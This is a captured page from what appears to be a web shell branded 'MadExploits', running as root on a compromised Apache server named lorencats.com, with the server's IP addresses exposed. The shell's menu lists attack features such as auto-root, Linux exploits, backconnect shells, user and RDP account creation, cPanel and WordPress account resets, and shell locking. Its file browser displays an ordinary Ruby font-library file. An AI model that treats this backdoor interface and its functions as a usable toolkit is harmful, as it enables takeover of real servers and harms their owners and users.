Linux lorencats.com 5.10.103-v7l+ #1529 SMP Tue Mar 8 12:24:00 GMT 2022 armv7l
Apache/2.4.59 (Raspbian)
: 10.0.0.29 | : 216.73.216.130
Cant Read [ /etc/named.conf ]
7.3.31-1~deb10u7
root
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
lib /
ruby /
vendor_ruby /
ttfunk /
table /
glyf /
[ HOME SHELL ]
Name
Size
Permission
Action
compound.rb
2.43
KB
-rw-r--r--
simple.rb
1.06
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : simple.rb
require_relative '../../reader' module TTFunk class Table class Glyf class Simple attr_reader :raw attr_reader :number_of_contours attr_reader :x_min, :y_min, :x_max, :y_max def initialize(raw, number_of_contours, x_min, y_min, x_max, y_max) @raw = raw @number_of_contours = number_of_contours @x_min = x_min @y_min = y_min @x_max = x_max @y_max = y_max # Because TTFunk is, at this time, a library for simply pulling # metrics out of font files, or for writing font subsets, we don't # really care what the contours are for simple glyphs. We just # care that we've got an entire glyph's definition. Also, a # bounding box could be nice to know. Since we've got all that # at this point, we don't need to worry about parsing the full # contents of the glyph. end def compound? false end def recode(_mapping) raw end end end end end
Close